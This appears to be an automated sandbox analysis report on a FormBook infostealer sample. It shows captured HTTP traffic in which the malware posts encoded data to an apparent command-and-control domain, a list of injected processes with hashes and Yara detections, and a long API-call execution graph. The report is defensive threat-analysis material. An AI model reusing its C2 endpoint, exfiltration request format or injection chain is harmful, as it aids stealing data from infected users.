                                            Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 50010 | Destination IP: 104.21.80.180 | Destination Port: 80 | PID: 2056 | Process: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Timestamp: Jan 10, 2025 17:45:12.942863941 CET | Bytes transferred: 822 | Direction: OUT | Data: POST /0hqe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.mzkd6gp5.top
                                            Origin: http://www.mzkd6gp5.top
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 223
                                            Referer: http://www.mzkd6gp5.top/0hqe/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Ascii: h0Z4uv=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYJXn4DPlq3Rj1iQ0cfpw1gWs0jhKokdYnHNNBn6j0mSqAdQXit/5CHjVYBijmOlco+Jqp91d8VUMQeUucrF8sKXcxizwsEf0Osm40XQ8vVmk78m8el7AXoJu1BIzejX53GDqwXcAFnim2Wrsh2VOTjuxTeonv0NDCGa9MHsLMPR7+E=
                                            Timestamp: Jan 10, 2025 17:45:13.878002882 CET | Bytes transferred: 966 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:13 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BSiuZvHVQdQzd0pOY1uvF7RLdUWTO9zkP8mUnXKVc5PnnqMf7IZZ0ZXdiPSJ%2FxpO9smrLnXZiBCmR3GNLXRWcIThfuHJ0f5Vu%2FmH6mqEaoDioYJOs3l0ODf0Q37Ttft4uPoW"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22de482f42d2-EWR
                                            Content-Encoding: gzip
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                            Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 50011 | Destination IP: 104.21.80.180 | Destination Port: 80 | PID: 2056 | Process: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Timestamp: Jan 10, 2025 17:45:15.486999035 CET | Bytes transferred: 10904 | Direction: OUT | Data: POST /0hqe/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate, br
                                            Host: www.mzkd6gp5.top
                                            Origin: http://www.mzkd6gp5.top
                                            Cache-Control: max-age=0
                                            Content-Type: application/x-www-form-urlencoded
                                            Connection: close
                                            Content-Length: 10303
                                            Referer: http://www.mzkd6gp5.top/0hqe/
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Data Ascii: h0Z4uv= [TRUNCATED]
                                            Timestamp: Jan 10, 2025 17:45:16.475223064 CET | Bytes transferred: 970 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:16 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrZZp2tDNMoTseK6nSnDiJTFQaFn%2Fo3cDfrQKiXcvKT2dzH37rHp1mgSFGgNXzWZqITT42gafw%2BNBCdbFaG6yHSYnWSJHiObD6NBdg7LSwIee0iGNpvKaPR21vgg3XZp0Vi%2B"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22eecacf43ee-EWR
                                            Content-Encoding: gzip
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=34229&min_rtt=34229&rtt_var=17114&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10904&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Timestamp: Jan 10, 2025 17:45:16.476088047 CET | Bytes transferred: 5 | Direction: IN
                                            Data Ascii: 0


                                            Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 50012 | Destination IP: 104.21.80.180 | Destination Port: 80 | PID: 2056 | Process: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Timestamp: Jan 10, 2025 17:45:18.031637907 CET | Bytes transferred: 533 | Direction: OUT | Data: GET /0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.mzkd6gp5.top
                                            Connection: close
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                            Timestamp: Jan 10, 2025 17:45:18.946753025 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                            Date: Fri, 10 Jan 2025 16:45:18 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            cf-cache-status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q2ASWDf1zmEQ5OpbBMi5%2BQOuPlgyojZg1ufAF95wZ71HzGnpDMC1DHkQLy2%2Bgrf0uPNELC44iiEURriAHZd9Pc0IgObhRhruoZJ%2BHCDbEvqjm5ygOxvhFiPZ4SjEXGVudrNY"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8ffe22fe3ae443ee-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=533&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                            Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                            Timestamp: Jan 10, 2025 17:45:18.946773052 CET | Bytes transferred: 90 | Direction: IN
                                            Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0



                                            Target ID:0
                                            Start time:11:43:17
                                            Start date:10/01/2025
                                            Path:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\qlG7x91YXH.exe"
                                            Imagebase:0xd70000
                                            File size:782'336 bytes
                                            MD5 hash:29E38E8C57AEA7A49657E5960D12F3E9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:11:43:20
                                            Start date:10/01/2025
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\qlG7x91YXH.exe"
                                            Imagebase:0x4c0000
                                            File size:46'504 bytes
                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:11:44:00
                                            Start date:10/01/2025
                                            Path:C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe"
                                            Imagebase:0x8a0000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Target ID:6
                                            Start time:11:44:02
                                            Start date:10/01/2025
                                            Path:C:\Windows\SysWOW64\ROUTE.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                            Imagebase:0x4c0000
                                            File size:19'456 bytes
                                            MD5 hash:C563191ED28A926BCFDB1071374575F1
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:7
                                            Start time:11:44:15
                                            Start date:10/01/2025
                                            Path:C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe"
                                            Imagebase:0x8a0000
                                            File size:140'800 bytes
                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Target ID:8
                                            Start time:11:44:28
                                            Start date:10/01/2025
                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                            Imagebase:0x7ff6bf500000
                                            File size:676'768 bytes
                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:3.3%
                                              Dynamic/Decrypted Code Coverage:0.4%
                                              Signature Coverage:6.5%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:43
                                              [Execution graph: the interactive node/edge listing is not reproduced here. Nodes are labelled with code addresses and the Windows APIs reached from each, among them LoadLibraryA/LoadLibraryExW/GetProcAddress/FreeLibrary, RegOpenKeyExW/RegQueryValueExW/RegCloseKey, ReadFile/ReadConsoleW/GetConsoleMode, RtlEnterCriticalSection/RtlLeaveCriticalSection, RtlAllocateHeap/RtlFreeHeap, RaiseException, IsDebuggerPresent/SetUnhandledExceptionFilter/UnhandledExceptionFilter/TerminateProcess, GetSystemTimeAsFileTime/QueryPerformanceCounter, FindResourceExW/LoadResource/LockResource, Shell_NotifyIconW/SetTimer/KillTimer/CreatePopupMenu/PostQuitMessage, GetTempPathW, GetModuleFileNameW/GetFullPathNameW, and GetPEB/Sleep.]
RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96895->96913 96896 d8fddb 22 API calls 96896->96913 96897 d7fef7 96905 d7a8c7 22 API calls 96897->96905 96911 d7ed9d ISource 96897->96911 96900 dc4b0b 97149 de359c 82 API calls __wsopen_s 96900->97149 96901 d7a8c7 22 API calls 96901->96913 96902 dc4600 96906 d7a8c7 22 API calls 96902->96906 96902->96911 96905->96911 96906->96911 96908 d90242 RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 96908->96913 96909 d7fbe3 96909->96911 96912 dc4bdc 96909->96912 96917 d7f3ae ISource 96909->96917 96910 d7a961 22 API calls 96910->96913 96911->96856 97150 de359c 82 API calls __wsopen_s 96912->97150 96913->96895 96913->96896 96913->96897 96913->96900 96913->96901 96913->96902 96913->96908 96913->96909 96913->96910 96913->96911 96914 d900a3 29 API calls pre_c_initialization 96913->96914 96916 dc4beb 96913->96916 96913->96917 97146 d801e0 256 API calls 2 library calls 96913->97146 97147 d806a0 41 API calls ISource 96913->97147 96914->96913 97151 de359c 82 API calls __wsopen_s 96916->97151 96917->96911 97148 de359c 82 API calls __wsopen_s 96917->97148 97152 df7f59 96918->97152 96920 df95af 96920->96864 96922 d77510 53 API calls 96921->96922 96923 def126 96922->96923 97285 d79e90 96923->97285 96925 def136 96926 def15b 96925->96926 96927 d7ec40 256 API calls 96925->96927 96929 def15f 96926->96929 97313 d79c6e 96926->97313 96927->96926 96929->96864 96931 d79c6e 22 API calls 96930->96931 96932 d8f012 96931->96932 96933 d8fddb 22 API calls 96932->96933 96939 dcf0a8 96932->96939 96935 d8f02b 96933->96935 96936 d8fe0b 22 API calls 96935->96936 96938 d8f03c 96936->96938 96937 d8f0a4 96945 d8f0b1 96937->96945 97355 d7b567 96937->97355 97360 d76246 96938->97360 96939->96937 97392 de9caa 39 API calls 96939->97392 96943 dcf10a 96943->96945 96946 dcf112 96943->96946 96944 d7a961 22 API calls 96947 d8f04f 96944->96947 97336 d8fa5b 
96945->97336 96950 d7b567 39 API calls 96946->96950 96948 d76246 CloseHandle 96947->96948 96951 d8f056 96948->96951 96955 d8f0b8 96950->96955 96952 d77510 53 API calls 96951->96952 96953 d8f062 96952->96953 96954 d76246 CloseHandle 96953->96954 96956 d8f06c 96954->96956 96957 dcf127 96955->96957 96958 d8f0d3 96955->96958 97364 d75745 96956->97364 96961 d8fe0b 22 API calls 96957->96961 96960 d76270 22 API calls 96958->96960 96963 d8f0db 96960->96963 96964 dcf12c 96961->96964 97341 d8f141 96963->97341 96968 dcf140 96964->96968 97393 d8f866 ReadFile SetFilePointerEx 96964->97393 96965 dcf0a0 97391 d76216 CloseHandle ISource 96965->97391 96966 d8f085 97372 d753de 96966->97372 96976 dcf144 __fread_nolock 96968->96976 97394 de0e85 22 API calls ___scrt_fastfail 96968->97394 96971 d8f0ea 96971->96976 97388 d762b5 22 API calls 96971->97388 96975 d8f093 97387 d753c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96975->97387 96978 d8f0fe 96979 d8f138 96978->96979 96982 d76246 CloseHandle 96978->96982 96979->96864 96980 dcf069 97390 ddccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96980->97390 96981 d8f09a 96981->96937 96981->96980 96983 d8f12c 96982->96983 96983->96979 97389 d76216 CloseHandle ISource 96983->97389 96985 dcf080 96985->96937 96988 df7f59 120 API calls 96987->96988 96989 df959b 96988->96989 96989->96864 97459 dddbbe lstrlenW 96990->97459 96994 d7a961 22 API calls 96993->96994 96995 de6f1d 96994->96995 96996 d7a961 22 API calls 96995->96996 96997 de6f26 96996->96997 96998 de6f3a 96997->96998 96999 d7b567 39 API calls 96997->96999 97000 d77510 53 API calls 96998->97000 96999->96998 97003 de6f57 _wcslen 97000->97003 97001 de70bf 97005 d74ecb 94 API calls 97001->97005 97002 de6fbc 97004 d77510 53 API calls 97002->97004 97003->97001 97003->97002 97013 de70e9 97003->97013 97006 de6fc8 97004->97006 97007 de70d0 97005->97007 97010 d7a8c7 22 API calls 97006->97010 97015 de6fdb 97006->97015 97008 de70e5 97007->97008 97011 d74ecb 94 API calls 
97007->97011 97009 d7a961 22 API calls 97008->97009 97008->97013 97012 de711a 97009->97012 97010->97015 97011->97008 97014 d7a961 22 API calls 97012->97014 97013->96864 97018 de7126 97014->97018 97016 de7027 97015->97016 97019 de7005 97015->97019 97023 d7a8c7 22 API calls 97015->97023 97017 d77510 53 API calls 97016->97017 97021 de7034 97017->97021 97022 d7a961 22 API calls 97018->97022 97020 d733c6 22 API calls 97019->97020 97024 de700f 97020->97024 97025 de703d 97021->97025 97026 de7047 97021->97026 97027 de712f 97022->97027 97023->97019 97028 d77510 53 API calls 97024->97028 97029 d7a8c7 22 API calls 97025->97029 97615 dde199 GetFileAttributesW 97026->97615 97031 d7a961 22 API calls 97027->97031 97032 de701b 97028->97032 97029->97026 97034 de7138 97031->97034 97035 d76350 22 API calls 97032->97035 97033 de7050 97036 de7063 97033->97036 97039 d74c6d 22 API calls 97033->97039 97037 d77510 53 API calls 97034->97037 97035->97016 97038 d77510 53 API calls 97036->97038 97046 de7069 97036->97046 97040 de7145 97037->97040 97042 de70a0 97038->97042 97039->97036 97464 d7525f 97040->97464 97616 ddd076 57 API calls 97042->97616 97043 de7166 97045 d74c6d 22 API calls 97043->97045 97047 de7175 97045->97047 97046->97013 97048 de71a9 97047->97048 97049 d74c6d 22 API calls 97047->97049 97050 d7a8c7 22 API calls 97048->97050 97051 de7186 97049->97051 97052 de71ba 97050->97052 97051->97048 97054 d76b57 22 API calls 97051->97054 97053 d76350 22 API calls 97052->97053 97055 de71c8 97053->97055 97057 de719b 97054->97057 97056 d76350 22 API calls 97055->97056 97058 de71d6 97056->97058 97059 d76b57 22 API calls 97057->97059 97060 d76350 22 API calls 97058->97060 97059->97048 97061 de71e4 97060->97061 97062 d77510 53 API calls 97061->97062 97063 de71f0 97062->97063 97506 ddd7bc 97063->97506 97065 de7201 97066 ddd4ce 4 API calls 97065->97066 97067 de720b 97066->97067 97068 d77510 53 API calls 97067->97068 97071 de7239 97067->97071 97069 de7229 97068->97069 97560 de2947 97069->97560 97072 
d74f39 68 API calls 97071->97072 97072->97013 97074 de7474 97073->97074 97075 de7469 97073->97075 97079 d7a961 22 API calls 97074->97079 97112 de7554 97074->97112 97076 d7b567 39 API calls 97075->97076 97076->97074 97077 d8fddb 22 API calls 97078 de7587 97077->97078 97080 d8fe0b 22 API calls 97078->97080 97081 de7495 97079->97081 97082 de7598 97080->97082 97083 d7a961 22 API calls 97081->97083 97084 d76246 CloseHandle 97082->97084 97085 de749e 97083->97085 97087 de75a3 97084->97087 97086 d77510 53 API calls 97085->97086 97088 de74aa 97086->97088 97089 d7a961 22 API calls 97087->97089 97090 d7525f 22 API calls 97088->97090 97091 de75ab 97089->97091 97092 de74bf 97090->97092 97093 d76246 CloseHandle 97091->97093 97094 d76350 22 API calls 97092->97094 97095 de75b2 97093->97095 97096 de74f2 97094->97096 97097 d77510 53 API calls 97095->97097 97098 de754a 97096->97098 97100 ddd4ce 4 API calls 97096->97100 97099 de75be 97097->97099 97102 d7b567 39 API calls 97098->97102 97101 d76246 CloseHandle 97099->97101 97103 de7502 97100->97103 97104 de75c8 97101->97104 97102->97112 97103->97098 97105 de7506 97103->97105 97106 d75745 5 API calls 97104->97106 97107 d79cb3 22 API calls 97105->97107 97108 de75e2 97106->97108 97109 de7513 97107->97109 97110 de76de GetLastError 97108->97110 97111 de75ea 97108->97111 97626 ddd2c1 26 API calls 97109->97626 97114 de76f7 97110->97114 97116 d753de 27 API calls 97111->97116 97112->97077 97119 de76a4 97112->97119 97630 d76216 CloseHandle ISource 97114->97630 97115 de751c 97115->97098 97118 de75f8 97116->97118 97627 d753c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97118->97627 97119->96864 97121 de7645 97122 d8fddb 22 API calls 97121->97122 97125 de7679 97122->97125 97123 de7619 97628 ddccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97123->97628 97124 de75ff 97124->97121 97124->97123 97127 d7a961 22 API calls 97125->97127 97128 de7686 97127->97128 97128->97119 97629 dd417d 22 API calls __fread_nolock 97128->97629 
97130->96866 97131->96825 97132->96827 97133->96837 97134->96849 97135->96849 97136->96823 97137->96860 97138->96860 97139->96860 97140->96858 97141->96860 97142->96888 97143->96890 97144->96891 97145->96886 97146->96913 97147->96913 97148->96911 97149->96911 97150->96916 97151->96911 97190 d77510 97152->97190 97156 df8281 97157 df844f 97156->97157 97163 df828f 97156->97163 97254 df8ee4 60 API calls 97157->97254 97160 df845e 97162 df846a 97160->97162 97160->97163 97161 d77510 53 API calls 97180 df8049 97161->97180 97178 df7fd5 ISource 97162->97178 97226 df7e86 97163->97226 97168 df82c8 97241 d8fc70 97168->97241 97171 df82e8 97247 de359c 82 API calls __wsopen_s 97171->97247 97172 df8302 97248 d763eb 22 API calls 97172->97248 97175 df82f3 GetCurrentProcess TerminateProcess 97175->97172 97176 df8311 97249 d76a50 22 API calls 97176->97249 97178->96920 97179 df832a 97189 df8352 97179->97189 97250 d804f0 22 API calls 97179->97250 97180->97156 97180->97161 97180->97178 97245 dd417d 22 API calls __fread_nolock 97180->97245 97246 df851d 42 API calls _strftime 97180->97246 97181 df84c5 97181->97178 97186 df84d9 FreeLibrary 97181->97186 97183 df8341 97251 df8b7b 75 API calls 97183->97251 97186->97178 97189->97181 97252 d804f0 22 API calls 97189->97252 97253 d7aceb 23 API calls ISource 97189->97253 97255 df8b7b 75 API calls 97189->97255 97191 d77525 97190->97191 97192 d77522 97190->97192 97193 d7752d 97191->97193 97194 d7755b 97191->97194 97192->97178 97213 df8cd3 97192->97213 97256 d951c6 26 API calls 97193->97256 97196 db50f6 97194->97196 97197 d7756d 97194->97197 97204 db500f 97194->97204 97259 d95183 26 API calls 97196->97259 97257 d8fb21 51 API calls 97197->97257 97198 d7753d 97203 d8fddb 22 API calls 97198->97203 97201 db510e 97201->97201 97205 d77547 97203->97205 97207 d8fe0b 22 API calls 97204->97207 97212 db5088 97204->97212 97206 d79cb3 22 API calls 97205->97206 97206->97192 97209 db5058 97207->97209 97208 d8fddb 22 API calls 97210 db507f 97208->97210 97209->97208 
97211 d79cb3 22 API calls 97210->97211 97211->97212 97258 d8fb21 51 API calls 97212->97258 97214 d7aec9 22 API calls 97213->97214 97215 df8cee CharLowerBuffW 97214->97215 97260 dd8e54 97215->97260 97219 d7a961 22 API calls 97220 df8d2a 97219->97220 97267 d76d25 97220->97267 97222 df8d3e 97223 d793b2 22 API calls 97222->97223 97225 df8d48 _wcslen 97223->97225 97224 df8e5e _wcslen 97224->97180 97225->97224 97280 df851d 42 API calls _strftime 97225->97280 97227 df7eec 97226->97227 97228 df7ea1 97226->97228 97232 df9096 97227->97232 97229 d8fe0b 22 API calls 97228->97229 97230 df7ec3 97229->97230 97230->97227 97231 d8fddb 22 API calls 97230->97231 97231->97230 97233 df92ab ISource 97232->97233 97238 df90ba _strcat _wcslen 97232->97238 97233->97168 97234 d7b567 39 API calls 97234->97238 97235 d7b38f 39 API calls 97235->97238 97236 d7b6b5 39 API calls 97236->97238 97237 d77510 53 API calls 97237->97238 97238->97233 97238->97234 97238->97235 97238->97236 97238->97237 97239 d9ea0c 21 API calls ___std_exception_copy 97238->97239 97284 ddefae 24 API calls _wcslen 97238->97284 97239->97238 97243 d8fc85 97241->97243 97242 d8fd1d VirtualProtect 97244 d8fceb 97242->97244 97243->97242 97243->97244 97244->97171 97244->97172 97245->97180 97246->97180 97247->97175 97248->97176 97249->97179 97250->97183 97251->97189 97252->97189 97253->97189 97254->97160 97255->97189 97256->97198 97257->97198 97258->97196 97259->97201 97261 dd8e74 _wcslen 97260->97261 97262 dd8f63 97261->97262 97263 dd8ea9 97261->97263 97266 dd8f68 97261->97266 97262->97219 97262->97225 97263->97262 97281 d8ce60 41 API calls 97263->97281 97266->97262 97282 d8ce60 41 API calls 97266->97282 97268 d76d34 97267->97268 97269 d76d91 97267->97269 97268->97269 97270 d76d3f 97268->97270 97271 d793b2 22 API calls 97269->97271 97272 db4c9d 97270->97272 97273 d76d5a 97270->97273 97276 d76d62 __fread_nolock 97271->97276 97275 d8fddb 22 API calls 97272->97275 97283 d76f34 22 API calls 97273->97283 97277 db4ca7 97275->97277 
97276->97222 97278 d8fe0b 22 API calls 97277->97278 97279 db4cda 97278->97279 97280->97224 97281->97263 97282->97266 97283->97276 97284->97238 97286 d76270 22 API calls 97285->97286 97312 d79eb5 97286->97312 97287 d79fd2 97328 d7a4a1 22 API calls __fread_nolock 97287->97328 97289 d79fec 97289->96925 97292 d7a6c3 22 API calls 97292->97312 97293 dbf7c4 97333 dd96e2 84 API calls __wsopen_s 97293->97333 97294 dbf699 97300 d8fddb 22 API calls 97294->97300 97295 d7a405 97295->97289 97335 dd96e2 84 API calls __wsopen_s 97295->97335 97298 d7a4a1 22 API calls 97298->97312 97302 dbf754 97300->97302 97301 dbf7d2 97334 d7a4a1 22 API calls __fread_nolock 97301->97334 97305 d8fe0b 22 API calls 97302->97305 97304 dbf7e8 97304->97289 97307 d7a12c __fread_nolock 97305->97307 97307->97293 97307->97295 97308 d7a587 22 API calls 97308->97312 97309 d7aec9 22 API calls 97310 d7a0db CharUpperBuffW 97309->97310 97329 d7a673 22 API calls 97310->97329 97312->97287 97312->97292 97312->97293 97312->97294 97312->97295 97312->97298 97312->97307 97312->97308 97312->97309 97327 d74573 41 API calls _wcslen 97312->97327 97330 d748c8 23 API calls 97312->97330 97331 d749bd 22 API calls __fread_nolock 97312->97331 97332 d7a673 22 API calls 97312->97332 97314 d79c7e 97313->97314 97315 dbf545 97313->97315 97320 d8fddb 22 API calls 97314->97320 97316 dbf556 97315->97316 97317 d76b57 22 API calls 97315->97317 97318 d7a6c3 22 API calls 97316->97318 97317->97316 97319 dbf560 97318->97319 97319->97319 97321 d79c91 97320->97321 97322 d79cac 97321->97322 97323 d79c9a 97321->97323 97325 d7a961 22 API calls 97322->97325 97324 d79cb3 22 API calls 97323->97324 97326 d79ca2 97324->97326 97325->97326 97326->96929 97327->97312 97328->97289 97329->97312 97330->97312 97331->97312 97332->97312 97333->97301 97334->97304 97335->97289 97395 d754c6 97336->97395 97339 d754c6 3 API calls 97340 d8fa9a 97339->97340 97340->96955 97342 d8f14c 97341->97342 97343 d8f188 97341->97343 97342->97343 97345 d8f15b 97342->97345 97344 
d7a6c3 22 API calls 97343->97344 97351 ddcaeb 97344->97351 97347 d8f170 97345->97347 97349 d8f17d 97345->97349 97346 ddcb1a 97346->96971 97401 d8f18e 97347->97401 97408 ddcbf2 26 API calls 97349->97408 97351->97346 97409 ddca89 ReadFile SetFilePointerEx 97351->97409 97410 d749bd 22 API calls __fread_nolock 97351->97410 97352 d8f179 97352->96971 97356 d7b578 97355->97356 97357 d7b57f 97355->97357 97356->97357 97458 d962d1 39 API calls 97356->97458 97357->96943 97359 d7b5c2 97359->96943 97361 d76250 97360->97361 97362 d7625f 97360->97362 97361->96944 97362->97361 97363 d76264 CloseHandle 97362->97363 97363->97361 97365 d7575c CreateFileW 97364->97365 97366 db4035 97364->97366 97368 d7577b 97365->97368 97367 db403b CreateFileW 97366->97367 97366->97368 97367->97368 97369 db4063 97367->97369 97368->96965 97368->96966 97370 d754c6 3 API calls 97369->97370 97371 db406e 97370->97371 97371->97368 97373 d753f3 97372->97373 97386 d753f0 ISource 97372->97386 97374 d754c6 3 API calls 97373->97374 97373->97386 97375 d75410 97374->97375 97376 db3f4b 97375->97376 97377 d7541d 97375->97377 97378 d8fa5b 3 API calls 97376->97378 97379 d8fe0b 22 API calls 97377->97379 97378->97386 97380 d75429 97379->97380 97381 d75722 